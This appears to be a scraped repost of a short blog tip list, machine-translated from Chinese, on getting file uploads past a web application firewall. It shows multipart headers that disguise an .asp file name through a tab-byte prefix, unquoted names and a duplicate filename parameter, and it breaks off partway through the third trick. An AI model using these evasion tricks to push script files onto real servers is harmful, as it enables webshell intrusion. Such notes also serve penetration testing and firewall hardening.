当前位置:网站首页>Tips for file upload to bypass WAF

Tips for file upload to bypass WAF

2022-07-27 21:05:00 Cwillchris

The original default state :

  1. ——WebKitFormBoundary2smpsxFB3D0KbA7D
  2. Content­Disposition: form­data; name=”filepath”; filename="backlion.asp”
  3. Content­Type: text/html

breakthrough 0, Prefix the file name with [0x09] Bypass :

  1. ——WebKitFormBoundary2smpsxFB3D0KbA7D
  2. Content­Disposition: form­data; name=”filepath”; filename=”[0x09]backlion.asp”
  3. Content­Type: text/html

breakthrough 1, Remove the double quotation marks from the file name to bypass :

  1. ——WebKitFormBoundary2smpsxFB3D0KbA7D
  2. Content­Disposition: form­data; name=”filepath”; filename=backlion.asp
  3. Content­Type: text/html

breakthrough 2, Add one filename1 File name parameter for , And assign a value to bypass :

  1. ——WebKitFor
原网站

版权声明
本文为[Cwillchris]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/208/202207271828175948.html

边栏推荐

猜你喜欢

随机推荐